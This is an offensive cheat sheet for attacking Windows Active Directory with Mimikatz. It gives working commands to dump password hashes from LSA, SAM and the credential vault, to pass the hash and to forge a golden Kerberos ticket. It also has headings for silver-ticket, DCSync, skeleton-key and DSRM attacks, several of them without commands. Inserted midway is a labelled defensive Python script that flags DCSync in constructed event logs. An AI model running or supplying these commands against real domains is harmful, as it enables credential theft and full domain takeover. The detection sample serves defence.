MIMIKATZ

Dump hashes from local machine

Invoke-Mimikatz -DumpCreds

To dump all the hashes

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

To dump hashes from SAM

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

To view clear text credentials from credential vault

Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'

OVER PASS THE HASH ATTACK

Perform Pass The Hash for a specific user

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USERNAME> /domain:<USER DOMAIN> /ntlm:<NTLM HASH OF USER> /run:powershell.exe"'

GOLDEN TICKET ATTACK

Execute mimikatz as Domain Admin on DC to get krbtgt NTLM hash

Perform Golden Ticket Attack for a specific user

Invoke-Mimikatz -Command '"kerberos::golden /user:<USERNAME> /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /krbtgt:<NTLM OF KRBTGT> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

SILVER TICKET ATTACK

Perform Silver Ticket Attack for a specific user

DC SYNC ATTACK

Check replication rights for a specific user

To add replication/DCSync rights for a specific user (Needs Domain Admin Privileges)

Perform DCSync attack to extract the "krbtgt" hashes, which can later be used to perform Golden Ticket attacks
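DCSync works by requesting directory replication, and a domain controller with object-access auditing enabled records that request as Security event 4662 carrying the replication control-access GUIDs. The following is an added detection example, not part of this cheat sheet: it scans constructed, simplified 4662 records and flags replication requests from any account that is not a known DC computer account (the event format, account names and `KNOWN_DC_ACCOUNTS` are assumptions for the sample).

```python
import re

# Well-known AD control-access-right GUIDs that DCSync needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed: DC computer accounts that legitimately replicate with each other.
KNOWN_DC_ACCOUNTS = {"CORP\\DC01$", "CORP\\DC02$"}

# Constructed, flattened 4662 records (one key=value field per token).
SAMPLE_EVENTS = [
    "EventID=4662 Account=CORP\\DC02$ Object=DC=corp,DC=local "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 Account=CORP\\jdoe Object=DC=corp,DC=local "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 Account=CORP\\svc_backup Object=CN=Users,DC=corp,DC=local "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 Account=CORP\\jdoe LogonType=3",
]

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def parse_event(line):
    """Turn 'k=v k=v ...' into a dict; values may themselves contain '='."""
    return dict(token.split("=", 1) for token in line.split())


def dcsync_alerts(lines, dc_accounts=KNOWN_DC_ACCOUNTS):
    """Return (account, [rights]) for every 4662 replication request
    issued by an account outside the DC allow-list."""
    allowed = {a.lower() for a in dc_accounts}
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if not rights or ev.get("Account", "").lower() in allowed:
            continue  # not a replication request, or normal DC-to-DC replication
        alerts.append((ev["Account"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in dcsync_alerts(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```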

SKELETON KEY ATTACK

Needs to be run with Domain Admin privileges on the DC; it is applied once per DC and stays in effect until that DC is rebooted

Perform Skeleton Key Attack (Password: mimikatz - valid for all users until the DC is restarted)

USING DSRM HASH

Dump the DSRM Administrator hash from SAM of DC

The DSRM Administrator is not allowed to log on to the Domain Controller by default

The registry value that controls this logon behaviour has to be changed on the DC to allow access

Pass The Hash can then be used with this hash to access the file system of the DC remotely
